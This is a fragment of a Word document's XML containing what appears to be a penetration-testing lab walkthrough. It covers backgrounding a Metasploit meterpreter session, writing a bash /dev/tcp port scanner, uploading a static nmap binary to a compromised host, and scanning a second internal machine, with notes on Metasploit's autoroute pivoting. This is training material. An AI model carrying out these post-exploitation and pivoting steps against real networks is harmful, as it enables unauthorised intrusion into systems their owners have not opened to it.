      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>/bin/" directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C9F8CD" w14:textId="2D758A71" w:rsidR="0055368C" w:rsidRPr="006B1B1C" w:rsidRDefault="0055368C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="0055368C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="0055368C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/usr/bin/</w:t>
      </w:r>
      <w:r w:rsidRPr="0055368C">
        <w:t xml:space="preserve"> is a system directory that holds most user-level executable programs and utilities (commands you run from the shell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A488E" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232E5890" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:lastRenderedPageBreak/>
        <w:t>ls -al /root/static-binaries/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44085225" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>file /root/static-binaries/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E443A60" w14:textId="22731861" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="0055368C" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="347AFAEF" wp14:editId="31B18CBA">
            <wp:extent cx="5943600" cy="1461135"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="72336471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64711" name="Picture 7233647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1BB0" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 11:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t> Background the Metasploit session and create a bash port scanning script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB30C39" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>CTRL+z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> to background the Metasploit session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8C605" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>Using the script provided at [https://catonmat.net/tcp-port-scanner-in-bash] as a reference, create a bash script to scan the first 1000 ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57016317" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4348D0" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D3D24" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>for port in {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>1..1000};</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212F3F02" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> timeout 1 bash -c "echo &gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>/$1/$port" 2&gt;/dev/null &amp;&amp; echo "port $port is open"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C90FAA8" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ECCB15" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>Save the script as bash-port-scanner.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2737CC7B" w14:textId="561B2AB8" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CE54679" wp14:editId="6AAA39D1">
            <wp:extent cx="5943600" cy="1310005"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="652051182" name="Picture 2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C5B15" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 12:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> Foreground the Metasploit session and switch to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492F0AA5" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>Press "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>fg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>" and press enter to foreground the Metasploit session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB849DD" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F668AB" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1A499A" w14:textId="6E671CC0" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02CD7EA1" wp14:editId="2227DD72">
            <wp:extent cx="5943600" cy="1638935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="577565777" name="Picture 19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67ED9" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 13:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> Upload the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> static binary and the bash port scanner script to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBD25E0" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C62AA17" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>upload /root/static-binaries/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6023F22B" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>upload /root/bash-port-scanner.sh /tmp/bash-port-scanner.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0E5634" w14:textId="59CF9AB0" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="007C1DA3" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C6E306D" wp14:editId="5C07FB22">
            <wp:extent cx="5943600" cy="1697990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190535904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59040" name="Picture 19053590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E906" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 14:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t> Make the binary and script executable and use the bash script to scan the second target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB166BF" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBF5F83" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC01248" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A515D" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> +</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>x .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> ./bash-port-scanner.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F602457" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>./bash-port-scanner.sh 192.180.108.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365F095A" w14:textId="61736AF9" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="007C1DA3" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23DBCFD0" wp14:editId="56037932">
            <wp:extent cx="3994355" cy="1917799"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="27031571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15713" name="Picture 2703157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355" cy="191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A32D" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>Three ports are open on the target machine, ports 21, 22 and 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDEDB3F" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 15:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> Using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> binary, scan the target machine for open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E0149" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D44209" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> -p- 192.180.108.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6764D8D1" w14:textId="77777777" w:rsidR="007976DB" w:rsidRDefault="007976DB" w:rsidP="006B1B1C">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F61821" w14:textId="7D3EA5A0" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="007C1DA3" w:rsidP="006B1B1C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6226F130" wp14:editId="1C838980">
            <wp:extent cx="5403850" cy="2194560"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="107451634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16349" name="Picture 1074516349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128" cy="2194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8810E" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C" w:rsidP="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:t>The services running on the target machine are FTP, SSH and HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E7BDEB" w14:textId="77777777" w:rsidR="00345C10" w:rsidRDefault="00345C10"/>
    <w:p w14:paraId="49C3C279" w14:textId="77777777" w:rsidR="006B1B1C" w:rsidRDefault="006B1B1C"/>
    <w:p w14:paraId="19A61862" w14:textId="0636F5E1" w:rsidR="006B1B1C" w:rsidRPr="006B1B1C" w:rsidRDefault="006B1B1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AFAB10" w14:textId="5656240D" w:rsidR="006B1B1C" w:rsidRDefault="006B1B1C">
      <w:r w:rsidRPr="006B1B1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XODA</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:t xml:space="preserve"> is a lightweight, web-based file management system written in PHP.</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1B1C">
        <w:br/>
        <w:t>It lets users browse, upload, edit, and manage files on a server through a browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A6DC56" w14:textId="77777777" w:rsidR="0055368C" w:rsidRDefault="0055368C"/>
    <w:p w14:paraId="4DDE963D" w14:textId="32F2EF4D" w:rsidR="0055368C" w:rsidRDefault="0055368C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055368C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055368C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> autoroute</w:t>
      </w:r>
      <w:r w:rsidRPr="0055368C">
        <w:t xml:space="preserve"> tells Metasploit to add a route that forwards traffic </w:t>
      </w:r>
      <w:r w:rsidRPr="0055368C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>through an active Meterpreter session</w:t>
      </w:r>
      <w:r w:rsidRPr="0055368C">
        <w:t xml:space="preserve"> to networks the compromised host can reach. That lets you access internal hosts from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055368C">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055368C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00553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60F"/>
    <w:rsid w:val="00345C10"/>
    <w:rsid w:val="0043760F"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="0055368C"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006B1B1C"/>
    <w:rsid w:val="007976DB"/>
    <w:rsid w:val="007C1DA3"/>
    <w:rsid w:val="008539B2"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="0092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AB0CF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5B6B073D-74B9-4694-B015-EF8BF131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png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png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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-01T18:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-01T18:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>